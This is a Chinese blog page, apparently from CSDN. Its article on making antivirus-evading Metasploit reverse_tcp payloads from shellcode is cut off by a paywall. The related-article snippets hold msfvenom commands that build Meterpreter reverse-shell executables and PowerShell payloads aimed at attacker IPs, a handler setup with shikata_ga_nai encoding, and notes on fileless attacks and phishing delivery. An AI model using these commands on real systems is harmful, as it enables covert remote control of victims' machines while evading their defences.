使用shellcode打造MSF免杀payload

最新推荐文章于 2025-10-04 11:52:37 发布
原创 最新推荐文章于 2025-10-04 11:52:37 发布 · 2k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#免杀exe #免杀的payload #kali #shellcode #msf玩法

本文介绍了如何利用MSF生成shellcode,并通过多种方法将其编译为免杀的Windows reverse_tcp payload。测试表明,即使使用默认编译选项,生成的exe也能有效避免杀毒软件检测,且能正常执行。

在这里插入图片描述
0x00 前言
经常有同学提及MSF payload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。
0x01 从哪里开始
shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse_tcp来做测试吧!(其它的payload均可以)
CobaltStrike:payload>windows>meterpreter>reverse_tcp设置选项如下:监听9527端口。
在这里插入图片描述
接下来以同样的方式生成c格式的payload,打开payload查看:
在这里插入图片描述
没错,你看到的是shellcode,那么如何编译成我们需要的exe呢?
0x02 如何执行shellcode
经过一番搜索,大致得到了这么几种执行shellcode的方法(c语言,其它语言执行shellcode的方法可自己去寻找)
1:
在这里插入图片描述
2:

最低0.47元/天 解锁文章
Kali的学习笔记篇(八)使用msf生成的shellcode制作payload
Kind&红衣的博客
08-13 6845
环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年8月13日07:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
MSF编码器结合shellcode加载器实现
2401_83237906的博客
11-24 630
所用环境:技术简介: 技术全称为反毒技术, Anti-Virus 简称“”,指是一种能使病毒木马于被毒软件查的技术。技术的涉猎面广泛,其中包含反汇编、逆向工程、系统漏洞等技术,内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了毒软件的查。这里介绍一个网站,这是一个费的在线服务,它允许用户上传文件或提交网址,以检查它们是否包含恶意软件或其他潜在的安全威胁。VirusTotal 通过使用多种不同的病毒扫描引擎和安全工具来分析提交的文件或链接,从而提供更全面的检测结果。
使用MSF生成的shellcode打造payload
MickeyMouse1928的博客
05-04 1万+
环境: 1.Kali攻击机IP:192.168.114.140 2.使用win7生成exe 步骤: 使用msfvenom生成shellcodemsfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c win7中使用Visual studio创建Win32控制台
shellcode丨C语言三条指令360!你还困吗?
HUYA69的博客
09-07 1993
shellcode(1)C语言三条指令360 ✉1 简介 描述有错的地方各位师傅海涵。 经过一下午的C语言测试,得出了十多种过360的·方法,这里拿三种c的方式过360(思路大体相同),还有一个c++的360和火绒都可以过等有时间都可以跟大家更新。 ✉2 过程 废话就不多讲了对于初学者友好发展,先看一遍制作过程,我们准备好msf和cs的shllecode msfvenom -p windows/meterpreter/reverse_tcp LHOST="自...
MSF制作恶意文件 基础
最新发布
weixin_74737710的博客
10-04 1017
shellcode特征过滤将代码转换为的1.jpg加载 放进buf 再将数据流转换为bytearry 在最后在打包成exe文件 就实现exe文件和1.jpg要放在同一目录下)​ QQ => 安全应用 => 某个dll是能被解析并且提取的 => 将这个安全的呢dll替换成被改造过后的dll文件(shellcode)壳不安全,可能被脱壳 => 1. 自研一套壳(使用冷门的加壳手法) 2.软件开发中常用的壳. 遇到了未知加壳手法。有针对性的进行
msf生成payload并注入到可执行程序exe
redwand的博客
07-22 5930
msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。
使用shellcode打造MSFpayloadshellcode加载技术
jackey3Lin的专栏
10-21 5619
0x00 前言      经常有同学提及MSF payload问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造payload,那就是shellcode。  0x01 从哪里开始      shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse
【渗透测试笔记】之【MSF 生成payload
AA8j的博客
11-07 914
生成payload # 查看所有payloads show payloads # 查看windows可用(输完按两下回车) use payload/windows/ # 使用绑定端口payload msf5 > use payload/windows/shell_bind_tcp # 查看payload编码,里面可能含有“坏字符” msf5 payload(windows/shell_bind_tcp) > generate # 对坏字符编码(默认自动选择一个最合适的encoder,也可以手动指
Shellcode对抗(C/C++)
热门推荐
qq_74806534的博客
02-17 2万+
这里便是毒软件毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果毒软件发现我们的可执行文件是一个木马程序。加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件。因为我们的加载器的特征,各平台毒软件都有了已经,所有我们就要用新的,特征没有被锁定。
msfvenom常用脚本生成
03-19 430
1、 Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe 2、Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> ...
exec语言,实验使用 C 编译 shellcode 上线
weixin_39540018的博客
05-19 721
实验了一下这篇文章里面介绍的方法:[使用 C 编译 shellcode 上线](https://www.xljtj.com/archives/c-shellcode.html?from=timeline&isappinstalled=0)。这篇文章已经把步骤写的很清楚了,但是我会在本文中也记录清楚每一步,因为文章可能说没就没,记下来自己留个备份。顺便记下我遇到的几个mini tin...
Metasploit (MSF) 使用:包含基本使用payload生成、后渗透模块使用
Alone hackers的博客
03-06 6389
Metasploit (MSF) 使用:包含基本使用payload生成,后渗透模块使用
Metasploit (MSF) 使用并生成木马payload
2301_79642494的博客
10-29 2744
show: 查看选项 //当进入模块可是使用show option查看模块需要的参数选项,使用show targets和show payloads可查看target和payload选项参数。若出现handler failed to bind to说明该端口已经被占用,此时要把靶机的木马文件删除并重启靶机(因为木马一旦运行就不会停止,一直占用端口),再从头开始建立木马。如果需要退出删除session会话可以使用session -k 会话号,同使用-K可以删除全部session会话。
生成msf常用payload
hl1293348082的专栏
04-07 3033
msf作为一款强大的漏洞检测工具,如何生成适用于msfpayload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成的payload列表: msfvenom -l 正在上传…重新上传取消 生成二进制文件 关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。 Windows ms
msf下的各种生成payload命令
weixin_48450741的博客
06-15 418
msf下的各种生成payload命令 来自 : https://www.cnblogs.com/backlion/p/6000544.html
msf生成payload过滤
Catch me if you can
04-25 2253
坏字符过滤 使用msf generate模块来过滤
基本知识,shellcode混淆
白帽子凯哥聊黑客
06-17 2438
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查技术,这也是360查能力强的原因。
MSF
06-16
### 关于Metasploit Framework技术的详细说明 Metasploit Framework(简称MSF)是一款功能强大的渗透测试工具,提供了丰富的漏洞利用模块和载荷(payloads)。然而,在实际使用中,许多安全软件(如防病毒软件、入侵检测系统IDS等)会对这些载荷进行检测并阻止其运行。因此,研究和应用技术成为渗透测试中的重要环节[^1]。 #### 1. 编码与混淆技术 Metasploit Framework内置了多种编码器(Encoders),用于对payloads进行编码以改变其特征,从而避开安全软件的静态签名检测。常用的编码器包括但不限于以下几种: - **Shikata Ga Nai**:一种高效的多平台编码器,能够通过多次迭代生成不同的字节序列,同时保持payload的功能不变。 - **XOR Encoder**:通过对payload进行异或操作来改变其二进制形态。 - **Base64 Encoder**:将payload转换为Base64编码形式,适用于某些特定场景下的绕过需求。 示代码展示如何在Metasploit中使用编码器: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.100 set LPORT 4444 set Encoder x86/shikata_ga_nai set Iterations 5 exploit ``` #### 2. 自定义payload开发 除了使用内置的编码器外,还可以通过编写自定义payload来实现更高级的效果。如,通过修改payload的核心逻辑或引入额外的混淆层,使其难以被传统安全软件识别。此外,结合shellcode编写技术,可以生成具有特定功能的定制化payload。 #### 3. 利用无文件攻击技术 无文件攻击是一种不依赖于磁盘存储的攻击方式,所有恶意代码均在内存中执行,从而避留下可被扫描的文件痕迹。Metasploit支持通过PowerShell脚本或其他脚本语言实现无文件攻击,具体实现方式如下: - 使用`msfvenom`生成基于PowerShell的payload。 - 将生成的payload嵌入到合法程序中,或者直接通过网络传输到目标主机上执行。 示命令展示如何生成PowerShell格式的payload: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f psh-cmd > payload.ps1 ``` #### 4. 漏洞利用与后渗透阶段的策略 在漏洞利用过程中,选择合适的模块和载荷至关重要。如,针对Web应用程序漏洞利用时,可以优先考虑基于JavaScript或Flash的payload,因为这些类型的payload通常更容易绕过浏览器的安全机制[^5]。此外,在后渗透阶段,可以通过动态加载技术或进程注入等方式进一步隐藏攻击行为。 #### 5. 结合社会工程学手段 在某些情况下,即使payload本身具备较强的能力,但如果缺乏有效的投递方式,仍然可能导致攻击失败。因此,结合社会工程学手段(如钓鱼邮件、伪装文档等)可以显著提高攻击成功率。 ### 注意事项 尽管上述方法能够在一定程度上提升payload能力,但随着安全软件技术的不断进步,单纯依赖编码或混淆已无法满足复杂的实战需求。建议结合最新的研究成果和技术趋势,持续优化策略[^2]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值